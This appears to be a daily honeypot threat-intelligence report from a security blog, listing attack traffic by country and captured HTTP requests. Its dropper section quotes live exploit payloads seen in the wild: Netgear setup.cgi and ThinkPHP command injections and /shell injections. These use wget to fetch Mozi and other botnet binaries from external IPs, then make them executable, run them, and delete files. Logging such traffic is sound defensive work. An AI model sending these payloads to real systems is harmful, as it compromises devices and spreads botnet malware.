Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-04-01

·767 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-01
#

Interaction report on http service of various honeypot around the world.

ot_simplified_report
#

Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
IDGermany
USGermany
DEGermany
USGermany
USDubai
CNGeorgia
GB

botnet_dropper_behaviour
#

List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).

remote_addrrequest
117.245.7.13327;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
61.52.97.172GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://61.52.97.172:44680/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
103.207.124.222GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.207.124.222:43183/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
103.203.72.209GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.203.72.209:47702/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
123.4.159.241GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.4.159.241:60259/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
204.76.203.18GET /wget HTTP/1.1
47.101.204.123GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1
58.146.59.84GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1
124.220.11.157GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.95.147.201%2Fbins%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20jaws%3B HTTP/1.1\x5Cr\x5CnUser-Agent: Mozila/5.0\x5Cr\x5CnHost: 127.0.0.1:80\x5Cr\x5CnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8\x5Cr\x5CnConnection: keep-alive\x5Cr\x5Cn\x5Cr\x5Cn\x11
85.122.180.176GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
1.192.193.208GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://37.49.224.156/heuNJloMYQKaZcisDXxjIzCGdvW75fyPt9EHUpkOVw0SmBbF8L/M3tH.x86 -O thinkphp ; chmod 777 thinkphp ; ./thinkphp ThinkPHP.selfrep ; rm -rf thinkphp’ HTTP/1.1
101.69.248.251GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
61.10.103.203GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
180.153.27.22GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
121.22.35.6GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
58.242.106.187GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1

request
#

List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database..

number_of_occurencerequest
1925GET /l7vmra HTTP/1.1
2205GET /hmips HTTP/1.1
2225GET /s/arm6 HTTP/1.1
2255GET /s/arm7 HTTP/1.1
2404GET /bins/dlr.arm HTTP/1.1
2414GET /nshkarm HTTP/1.1
2983GET /nshmips HTTP/1.1
2993GET /nsharm5 HTTP/1.1
3003GET /nshkppc HTTP/1.1
3013GET /nsharm7 HTTP/1.1
3033GET /nsharm HTTP/1.1
3043GET /nshkx86 HTTP/1.1
3053GET /nshmpsl HTTP/1.1
3063GET /nshsh4 HTTP/1.1
3353GET /s/mipsel HTTP/1.1
3363GET /s/arm5 HTTP/1.1
3373GET /x0ox0ox0oxDefault/z0r0.spc HTTP/1.1
3383GET /x0ox0ox0oxDefault/z0r0.i686 HTTP/1.1
3443GET /bins/k86m HTTP/1.1
3473GET /bins/dlr.spc HTTP/1.1
3483GET /bins/dlr.arm7 HTTP/1.1
3493GET /bins/dlr.arm6 HTTP/1.1
3503GET /bins/dlr.arm5 HTTP/1.1
3513GET /bins/dlr.ppc HTTP/1.1
3523GET /nshkmpsl HTTP/1.1
3533GET /nshkmips HTTP/1.1
3543GET /nshkarm7 HTTP/1.1
3553GET /nshkarm5 HTTP/1.1
3653GET /spim HTTP/1.1
3663GET /bins/lespim HTTP/1.1
3873GET /arm4 HTTP/1.1
3883GET /Mozi.a HTTP/1.1
3953GET /bins/dlr.mpsl HTTP/1.1
3963GET /bins/dlr.mips HTTP/1.1
3973GET /bins/dlr.sh4 HTTP/1.1
4003GET /nshksh4 HTTP/1.1
4773GET /bins/hydra.x86_64 HTTP/1.1
4903GET /device.rsp?opt=user&cmd=list HTTP/1.1
5252GET /bins/sora.x86 HTTP/1.1
5362GET /s/mips HTTP/1.1
5372GET /nsharm6 HTTP/1.1
5382GET /nshppc HTTP/1.1
5612GET /jasperserver/login.html HTTP/1.1
5732GET /jasperserver-pro/login.html HTTP/1.1
6042GET /bins/spim HTTP/1.1
6182GET /bins/dlr.m68k HTTP/1.1
6202GET /nshkarm6 HTTP/1.1
6431GET /NmapUpperCheck1743482193 HTTP/1.1
6451GET /Nmap/folder/check1743482193 HTTP/1.1
6801GET /nmaplowercheck1743482193 HTTP/1.1
6811GET /0Ijy HTTP/1.1
7101GET /IPCamDesc.xml HTTP/1.1
7151GET /kylin/ HTTP/1.1
7371\x00\x0E\x08\xE2\x8Dd*\xFB{\x07Q\x00\x00\x00\x00\x00
7381\x00\x0E8\xE2\x8Dd*\xFB{\x07Q\x00\x00\x00\x00\x00
7911GET /odinhttpcall1743497781 HTTP/1.1
7921GET /OdinHttpCall1743497781 HTTP/1.1
7931GET /Odin/http/call1743497781 HTTP/1.1
8091\x00\x0E8\x8F
8131\x00\x0E8\xDA\x94\x9E\x85q\x8Cl\xC3\x00\x00\x00\x00\x00
8371\x00\x0E\x08\xF4u]\x14\x22\xB3\xD7\xCB\x00\x00\x00\x00\x00
8381\x00\x0E8\xF4u]\x14\x22\xB3\xD7\xCB\x00\x00\x00\x00\x00
8541\x00\x0E8w+/\x03D\x99\xE5E\x00\x00\x00\x00\x00
8631\x00\x0E85\xD2d\x08\xB7\x1D\x13\xEF\x00\x00\x00\x00\x00
8681GET /serein HTTP/1.1
9031\x00\x0E\x08%\x22\xE0\xDBC\xD4h\x94\x00\x00\x00\x00\x00
9041\x00\x0E8%\x22\xE0\xDBC\xD4h\x94\x00\x00\x00\x00\x00
9101\x00\x0E8z:\xD80\x85\x91\x22\xB4\x00\x00\x00\x00\x00
9141\x00\x0E8\x06\xEF\xC9\x99\x88_1z\x00\x00\x00\x00\x00
9411\x00\x0E8y\xDA@\xCD\x82?\xF1\x14\x00\x00\x00\x00\x00
9511GET /odinhttpcall1743487539 HTTP/1.1
9641\x00\x0E8\xF4M\xEER\xB4\xD9p\x18\x00\x00\x00\x00\x00
9651GET /OdinHttpCall1743487539 HTTP/1.1
9661GET /Odin/http/call1743487539 HTTP/1.1

country_iso_code
#

List of country names and number of requests received by IPs located in these countries.

number_of_occurencecountry_iso_code
01835NL
1402US
2261HK
3174BG
4163DE
5162FR
6137TW
793GB
886CN
960RU
1052PL
1151SC
1250BR
1334UA
1432CA
1529IN
1622PT
1719JP
1811GH
1910NG
209KR
219CH
228AZ
237BE
246ID
256MY
266IT
274MN
284AU
293SG
303IL
313VN
322IR
332IE
342TH
352RO
361MC
371ES
381NO
391AO
401CZ
411AE
421DK
431SE
441KH

Related

Report: 2025-03-31
·1556 words
Repport Daily
Report: 2025-03-30
·466 words
Repport Daily
Report: 2025-03-29
·486 words
Repport Daily